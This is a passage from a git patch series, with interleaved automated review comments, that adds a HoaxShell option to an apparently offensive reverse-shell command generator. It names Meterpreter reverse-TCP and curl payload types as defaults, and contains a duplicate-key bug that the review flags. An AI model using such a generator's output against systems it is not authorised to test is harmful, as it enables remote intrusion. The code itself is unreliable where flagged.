@@ -10,6 +10,7 @@ const listenerCommand = document.querySelector("#listener-command"); const reverseShellCommand = document.querySelector("#reverse-shell-command"); const bindShellCommand = document.querySelector("#bind-shell-command"); const msfVenomCommand = document.querySelector("#msfvenom-command"); +const hoaxShellCommand = document.querySelector("#hoaxshell-command"); const FilterType = { 'All': 'all', @@ -54,6 +55,15 @@ encoding: "None" }); }); + +document.querySelector("#hoaxshell-tab").addEventListener("click", () => { + document.querySelector("#hoaxshell-selection").innerHTML = ""; + rsg.setState({ + commandType: CommandType.HoaxShell, + encoding: "None" + }); +}); + var rawLinkButtons = document.querySelectorAll('.raw-listener'); for (const button of rawLinkButtons) { button.addEventListener("click", () => { @@ -93,6 +103,7 @@ const rsg = { ip: query.get('ip') || localStorage.getItem('ip') || '10.10.10.10', port: query.get('port') || localStorage.getItem('port') || 9001, payload: query.get('payload') || localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp', + payload: query.get('type') || localStorage.getItem('type') || 'cmd-curl', shell: query.get('shell') || localStorage.getItem('shell') || rsgData.shells[0], listener: query.get('listener') || localStorage.getItem('listener') || rsgData.listenerCommands[0][1], encoding: query.get('encoding') || localStorage.getItem('encoding') || 'None', 
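Review bot: The line added in the `@@ -93,6 +103,7 @@` hunk repeats the `payload` key already defined on the line above it in the `rsg` object literal. In a JavaScript object literal the later duplicate wins, so the `payload` query parameter and stored value are no longer read, and the default becomes `cmd-curl` instead of the msfvenom payload name. The intended line was presumably `type: query.get('type') || localStorage.getItem('type') || 'cmd-curl',`. The `getType` function added later in this patch does not read such a field, so it may be simpler to drop the line entirely. The `rsg` literal starts and ends outside this hunk.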
@@ -100,6 +111,7 @@ const rsg = { [CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name, [CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name, [CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name, + [CommandType.HoaxShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.HoaxShell })[0].name, }, commandType: CommandType.ReverseShell, filter: FilterType.All, @@ -116,6 +128,10 @@ const rsg = { [CommandType.MSFVenom]: { listSelection: '#msfvenom-selection', command: '#msfvenom-command' + }, + [CommandType.HoaxShell]: { + listSelection: '#hoaxshell-selection', + command: '#hoaxshell-command' } }, @@ -169,6 +185,16 @@ const rsg = { }, + getType: () => { + if (rsg.commandType === 'HoaxShell') { + let cmd_name = rsg.getSelectedCommandName(); + return hoaxshell_listener_types[cmd_name]; + } + + return 'cmd-curl' + + }, + generateReverseShellCommand: () => { let command @@ -358,6 +384,7 @@ const rsg = { command = command.replace('{port}', rsg.getPort()) command = command.replace('{ip}', rsg.getIP()) command = command.replace('{payload}', rsg.getPayload()) + command = command.replace('{type}', rsg.getType()) if (rsg.getPort() < 1024) { privilegeWarning.style.visibility = "visible"; @@ -456,6 +483,10 @@ document.querySelector('#copy-msfvenom-command').addEventListener('click', () => rsg.copyToClipboard(msfVenomCommand.innerText) }) +document.querySelector('#copy-hoaxshell-command').addEventListener('click', () => { + rsg.copyToClipboard(hoaxShellCommand.innerText) +}) + var downloadButton = document.querySelectorAll(".download-svg"); for (const Dbutton of downloadButton) { Dbutton.addEventListener("click", () => { From 4658cb578b86b964bbfc518e0ccbb88e1a6b603c Mon Sep 17 00:00:00 2001 
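Review bot: `getType` returns `hoaxshell_listener_types[cmd_name]` without a guard, so a selected name that is missing from the map returns `undefined`. The `command.replace('{type}', rsg.getType())` call added in the `@@ -358,6 +384,7 @@` hunk then writes the literal text `undefined` into the displayed listener command. Make the fallback explicit with `return hoaxshell_listener_types[cmd_name] || 'cmd-curl';`. Compare against `CommandType.HoaxShell` rather than the string `'HoaxShell'`, as the `@@ -100,6 +111,7 @@` hunk does for the sibling command types. `hoaxshell_listener_types` is a global defined in `js/data.js`, so this function depends on script load order, which deserves a one-line comment such as `// hoaxshell_listener_types is defined in js/data.js`.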
From: Panagiotis Chartas Date: Thu, 16 Feb 2023 17:59:08 +0100 Subject: [PATCH 6/8] Added Hoaxshell --- css/light-mode.css | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/css/light-mode.css b/css/light-mode.css index e848302..cd3d619 100644 --- a/css/light-mode.css +++ b/css/light-mode.css @@ -103,6 +103,15 @@ Ain't got time for using CSS the right way. !important everything! max-height: 20rem; } +[data-theme="light"] #hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(209, 209, 209, 0.75); + background-color: rgb(45, 139, 135); + color: #000; + max-height: 20rem; +} + [data-theme="light"] .custom-select { background-color: #f2f2f2; color: #000; From 2b454e51567ec4325a328a6c6375678e301d65aa Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Thu, 16 Feb 2023 18:02:45 +0100 Subject: [PATCH 7/8] Added HoaxShell --- css/dark-mode.css | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/css/dark-mode.css b/css/dark-mode.css index 8773912..bd715c5 100644 --- a/css/dark-mode.css +++ b/css/dark-mode.css @@ -69,6 +69,14 @@ _:-ms-fullscreen, :root body { max-height: 20rem; } +#hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(0, 0, 0, 0.75); + background-color: rgb(70, 70, 70); + max-height: 20rem; +} + #theme-selector { width: 100px; height: 30px; @@ -136,4 +144,4 @@ h2 { .github-corner .octo-arm { animation: octocat-wave 560ms ease-in-out } -} \ No newline at end of file +} From 8b8f6b9de2a45508a9613d668bb62e815b81d384 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Thu, 16 Feb 2023 18:04:50 +0100 Subject: [PATCH 8/8] Added HoaxShell --- css/meme-mode.css | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/css/meme-mode.css b/css/meme-mode.css index 205ec60..4a1a796 100644 --- a/css/meme-mode.css +++ b/css/meme-mode.css 
@@ -108,6 +108,15 @@ Ain't got time for using CSS the right way. !important everything! max-height: 20rem; } +[data-theme="meme"] #hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(153, 28, 143, 0.75); + background-color: rgb(45, 139, 135); + color: #000; + max-height: 20rem; +} + [data-theme="meme"] .custom-select { background-color: #f1c6ce; color: #000; @@ -330,4 +339,4 @@ Ain't got time for using CSS the right way. !important everything! 100% { color: orange; } -} \ No newline at end of file +}